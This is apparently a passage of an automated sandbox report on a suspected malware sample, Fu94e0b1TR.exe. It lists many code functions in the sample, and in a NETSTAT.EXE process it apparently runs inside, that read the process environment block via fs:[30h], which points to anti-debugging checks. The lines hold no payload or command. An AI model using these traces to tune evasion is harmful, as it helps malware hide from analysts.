            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B1DB5 mov eax, dword ptr fs:[00000030h]6_2_011B1DB5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B1DB5 mov eax, dword ptr fs:[00000030h]6_2_011B1DB5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B1DB5 mov eax, dword ptr fs:[00000030h]6_2_011B1DB5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B35A1 mov eax, dword ptr fs:[00000030h]6_2_011B35A1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B61A0 mov eax, dword ptr fs:[00000030h]6_2_011B61A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B61A0 mov eax, dword ptr fs:[00000030h]6_2_011B61A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012141E8 mov eax, dword ptr fs:[00000030h]6_2_012141E8
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01238DF1 mov eax, dword ptr fs:[00000030h]6_2_01238DF1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206DC9 mov eax, dword ptr fs:[00000030h]6_2_01206DC9
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206DC9 mov eax, dword ptr fs:[00000030h]6_2_01206DC9
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206DC9 mov eax, dword ptr fs:[00000030h]6_2_01206DC9
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206DC9 mov ecx, dword ptr fs:[00000030h]6_2_01206DC9
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206DC9 mov eax, dword ptr fs:[00000030h]6_2_01206DC9
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206DC9 mov eax, dword ptr fs:[00000030h]6_2_01206DC9
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118B1E1 mov eax, dword ptr fs:[00000030h]6_2_0118B1E1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118B1E1 mov eax, dword ptr fs:[00000030h]6_2_0118B1E1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118B1E1 mov eax, dword ptr fs:[00000030h]6_2_0118B1E1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119D5E0 mov eax, dword ptr fs:[00000030h]6_2_0119D5E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119D5E0 mov eax, dword ptr fs:[00000030h]6_2_0119D5E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01241C06 mov eax, dword ptr fs:[00000030h]6_2_01241C06
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0125740D mov eax, dword ptr fs:[00000030h]6_2_0125740D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0125740D mov eax, dword ptr fs:[00000030h]6_2_0125740D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0125740D mov eax, dword ptr fs:[00000030h]6_2_0125740D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206C0A mov eax, dword ptr fs:[00000030h]6_2_01206C0A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206C0A mov eax, dword ptr fs:[00000030h]6_2_01206C0A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206C0A mov eax, dword ptr fs:[00000030h]6_2_01206C0A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206C0A mov eax, dword ptr fs:[00000030h]6_2_01206C0A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01254015 mov eax, dword ptr fs:[00000030h]6_2_01254015
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01254015 mov eax, dword ptr fs:[00000030h]6_2_01254015
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119B02A mov eax, dword ptr fs:[00000030h]6_2_0119B02A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119B02A mov eax, dword ptr fs:[00000030h]6_2_0119B02A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119B02A mov eax, dword ptr fs:[00000030h]6_2_0119B02A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119B02A mov eax, dword ptr fs:[00000030h]6_2_0119B02A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01207016 mov eax, dword ptr fs:[00000030h]6_2_01207016
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01207016 mov eax, dword ptr fs:[00000030h]6_2_01207016
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01207016 mov eax, dword ptr fs:[00000030h]6_2_01207016
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B002D mov eax, dword ptr fs:[00000030h]6_2_011B002D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B002D mov eax, dword ptr fs:[00000030h]6_2_011B002D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B002D mov eax, dword ptr fs:[00000030h]6_2_011B002D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B002D mov eax, dword ptr fs:[00000030h]6_2_011B002D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B002D mov eax, dword ptr fs:[00000030h]6_2_011B002D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BBC2C mov eax, dword ptr fs:[00000030h]6_2_011BBC2C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A0050 mov eax, dword ptr fs:[00000030h]6_2_011A0050
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A0050 mov eax, dword ptr fs:[00000030h]6_2_011A0050
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BA44B mov eax, dword ptr fs:[00000030h]6_2_011BA44B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01251074 mov eax, dword ptr fs:[00000030h]6_2_01251074
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01242073 mov eax, dword ptr fs:[00000030h]6_2_01242073
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121C450 mov eax, dword ptr fs:[00000030h]6_2_0121C450
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121C450 mov eax, dword ptr fs:[00000030h]6_2_0121C450
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A746D mov eax, dword ptr fs:[00000030h]6_2_011A746D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119849B mov eax, dword ptr fs:[00000030h]6_2_0119849B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189080 mov eax, dword ptr fs:[00000030h]6_2_01189080
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BF0BF mov ecx, dword ptr fs:[00000030h]6_2_011BF0BF
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BF0BF mov eax, dword ptr fs:[00000030h]6_2_011BF0BF
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BF0BF mov eax, dword ptr fs:[00000030h]6_2_011BF0BF
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01203884 mov eax, dword ptr fs:[00000030h]6_2_01203884
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01203884 mov eax, dword ptr fs:[00000030h]6_2_01203884
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C90AF mov eax, dword ptr fs:[00000030h]6_2_011C90AF
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A0 mov eax, dword ptr fs:[00000030h]6_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206CF0 mov eax, dword ptr fs:[00000030h]6_2_01206CF0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206CF0 mov eax, dword ptr fs:[00000030h]6_2_01206CF0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01206CF0 mov eax, dword ptr fs:[00000030h]6_2_01206CF0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012414FB mov eax, dword ptr fs:[00000030h]6_2_012414FB
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov eax, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov ecx, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov eax, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov eax, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov eax, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121B8D0 mov eax, dword ptr fs:[00000030h]6_2_0121B8D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01258CD6 mov eax, dword ptr fs:[00000030h]6_2_01258CD6
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011858EC mov eax, dword ptr fs:[00000030h]6_2_011858EC
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AF716 mov eax, dword ptr fs:[00000030h]6_2_011AF716
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BA70E mov eax, dword ptr fs:[00000030h]6_2_011BA70E
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BA70E mov eax, dword ptr fs:[00000030h]6_2_011BA70E
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0125070D mov eax, dword ptr fs:[00000030h]6_2_0125070D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0125070D mov eax, dword ptr fs:[00000030h]6_2_0125070D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BE730 mov eax, dword ptr fs:[00000030h]6_2_011BE730
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121FF10 mov eax, dword ptr fs:[00000030h]6_2_0121FF10
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121FF10 mov eax, dword ptr fs:[00000030h]6_2_0121FF10
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01184F2E mov eax, dword ptr fs:[00000030h]6_2_01184F2E
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01184F2E mov eax, dword ptr fs:[00000030h]6_2_01184F2E
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0124131B mov eax, dword ptr fs:[00000030h]6_2_0124131B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118F358 mov eax, dword ptr fs:[00000030h]6_2_0118F358
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01258F6A mov eax, dword ptr fs:[00000030h]6_2_01258F6A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118DB40 mov eax, dword ptr fs:[00000030h]6_2_0118DB40
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119EF40 mov eax, dword ptr fs:[00000030h]6_2_0119EF40
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B3B7A mov eax, dword ptr fs:[00000030h]6_2_011B3B7A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B3B7A mov eax, dword ptr fs:[00000030h]6_2_011B3B7A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118DB60 mov ecx, dword ptr fs:[00000030h]6_2_0118DB60
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119FF60 mov eax, dword ptr fs:[00000030h]6_2_0119FF60
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01258B58 mov eax, dword ptr fs:[00000030h]6_2_01258B58
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01255BA5 mov eax, dword ptr fs:[00000030h]6_2_01255BA5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BB390 mov eax, dword ptr fs:[00000030h]6_2_011BB390
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B2397 mov eax, dword ptr fs:[00000030h]6_2_011B2397
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01198794 mov eax, dword ptr fs:[00000030h]6_2_01198794
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01191B8F mov eax, dword ptr fs:[00000030h]6_2_01191B8F
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01191B8F mov eax, dword ptr fs:[00000030h]6_2_01191B8F
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0123D380 mov ecx, dword ptr fs:[00000030h]6_2_0123D380
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0124138A mov eax, dword ptr fs:[00000030h]6_2_0124138A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01207794 mov eax, dword ptr fs:[00000030h]6_2_01207794
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01207794 mov eax, dword ptr fs:[00000030h]6_2_01207794
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01207794 mov eax, dword ptr fs:[00000030h]6_2_01207794
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B4BAD mov eax, dword ptr fs:[00000030h]6_2_011B4BAD
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B4BAD mov eax, dword ptr fs:[00000030h]6_2_011B4BAD
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B4BAD mov eax, dword ptr fs:[00000030h]6_2_011B4BAD
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C37F5 mov eax, dword ptr fs:[00000030h]6_2_011C37F5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012053CA mov eax, dword ptr fs:[00000030h]6_2_012053CA
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012053CA mov eax, dword ptr fs:[00000030h]6_2_012053CA
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B03E2 mov eax, dword ptr fs:[00000030h]6_2_011B03E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A3A1C mov eax, dword ptr fs:[00000030h]6_2_011A3A1C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BA61C mov eax, dword ptr fs:[00000030h]6_2_011BA61C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BA61C mov eax, dword ptr fs:[00000030h]6_2_011BA61C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01185210 mov eax, dword ptr fs:[00000030h]6_2_01185210
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01185210 mov ecx, dword ptr fs:[00000030h]6_2_01185210
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01185210 mov eax, dword ptr fs:[00000030h]6_2_01185210
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01185210 mov eax, dword ptr fs:[00000030h]6_2_01185210
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118AA16 mov eax, dword ptr fs:[00000030h]6_2_0118AA16
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118AA16 mov eax, dword ptr fs:[00000030h]6_2_0118AA16
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01198A0A mov eax, dword ptr fs:[00000030h]6_2_01198A0A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118C600 mov eax, dword ptr fs:[00000030h]6_2_0118C600
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118C600 mov eax, dword ptr fs:[00000030h]6_2_0118C600
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118C600 mov eax, dword ptr fs:[00000030h]6_2_0118C600
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B8E00 mov eax, dword ptr fs:[00000030h]6_2_011B8E00
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0123FE3F mov eax, dword ptr fs:[00000030h]6_2_0123FE3F
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C4A2C mov eax, dword ptr fs:[00000030h]6_2_011C4A2C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C4A2C mov eax, dword ptr fs:[00000030h]6_2_011C4A2C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118E620 mov eax, dword ptr fs:[00000030h]6_2_0118E620
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0123B260 mov eax, dword ptr fs:[00000030h]6_2_0123B260
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0123B260 mov eax, dword ptr fs:[00000030h]6_2_0123B260
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01258A62 mov eax, dword ptr fs:[00000030h]6_2_01258A62
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189240 mov eax, dword ptr fs:[00000030h]6_2_01189240
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189240 mov eax, dword ptr fs:[00000030h]6_2_01189240
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189240 mov eax, dword ptr fs:[00000030h]6_2_01189240
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189240 mov eax, dword ptr fs:[00000030h]6_2_01189240
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01197E41 mov eax, dword ptr fs:[00000030h]6_2_01197E41
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C927A mov eax, dword ptr fs:[00000030h]6_2_011C927A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AAE73 mov eax, dword ptr fs:[00000030h]6_2_011AAE73
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AAE73 mov eax, dword ptr fs:[00000030h]6_2_011AAE73
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AAE73 mov eax, dword ptr fs:[00000030h]6_2_011AAE73
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AAE73 mov eax, dword ptr fs:[00000030h]6_2_011AAE73
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AAE73 mov eax, dword ptr fs:[00000030h]6_2_011AAE73
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119766D mov eax, dword ptr fs:[00000030h]6_2_0119766D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01214257 mov eax, dword ptr fs:[00000030h]6_2_01214257
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01250EA5 mov eax, dword ptr fs:[00000030h]6_2_01250EA5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01250EA5 mov eax, dword ptr fs:[00000030h]6_2_01250EA5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01250EA5 mov eax, dword ptr fs:[00000030h]6_2_01250EA5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012046A7 mov eax, dword ptr fs:[00000030h]6_2_012046A7
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BD294 mov eax, dword ptr fs:[00000030h]6_2_011BD294
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BD294 mov eax, dword ptr fs:[00000030h]6_2_011BD294
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0121FE87 mov eax, dword ptr fs:[00000030h]6_2_0121FE87
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119AAB0 mov eax, dword ptr fs:[00000030h]6_2_0119AAB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119AAB0 mov eax, dword ptr fs:[00000030h]6_2_0119AAB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BFAB0 mov eax, dword ptr fs:[00000030h]6_2_011BFAB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011852A5 mov eax, dword ptr fs:[00000030h]6_2_011852A5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011852A5 mov eax, dword ptr fs:[00000030h]6_2_011852A5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011852A5 mov eax, dword ptr fs:[00000030h]6_2_011852A5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011852A5 mov eax, dword ptr fs:[00000030h]6_2_011852A5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011852A5 mov eax, dword ptr fs:[00000030h]6_2_011852A5
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B2ACB mov eax, dword ptr fs:[00000030h]6_2_011B2ACB
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B36CC mov eax, dword ptr fs:[00000030h]6_2_011B36CC
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C8EC7 mov eax, dword ptr fs:[00000030h]6_2_011C8EC7
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0123FEC0 mov eax, dword ptr fs:[00000030h]6_2_0123FEC0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01258ED6 mov eax, dword ptr fs:[00000030h]6_2_01258ED6
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B16E0 mov ecx, dword ptr fs:[00000030h]6_2_011B16E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011976E2 mov eax, dword ptr fs:[00000030h]6_2_011976E2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B2AE4 mov eax, dword ptr fs:[00000030h]6_2_011B2AE4
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D736CC mov eax, dword ptr fs:[00000030h]18_2_02D736CC
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02DFFEC0 mov eax, dword ptr fs:[00000030h]18_2_02DFFEC0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D88EC7 mov eax, dword ptr fs:[00000030h]18_2_02D88EC7
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D716E0 mov ecx, dword ptr fs:[00000030h]18_2_02D716E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E18ED6 mov eax, dword ptr fs:[00000030h]18_2_02E18ED6
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D576E2 mov eax, dword ptr fs:[00000030h]18_2_02D576E2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7D294 mov eax, dword ptr fs:[00000030h]18_2_02D7D294
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7D294 mov eax, dword ptr fs:[00000030h]18_2_02D7D294
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E10EA5 mov eax, dword ptr fs:[00000030h]18_2_02E10EA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E10EA5 mov eax, dword ptr fs:[00000030h]18_2_02E10EA5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E10EA5 mov eax, dword ptr fs:[00000030h]18_2_02E10EA5
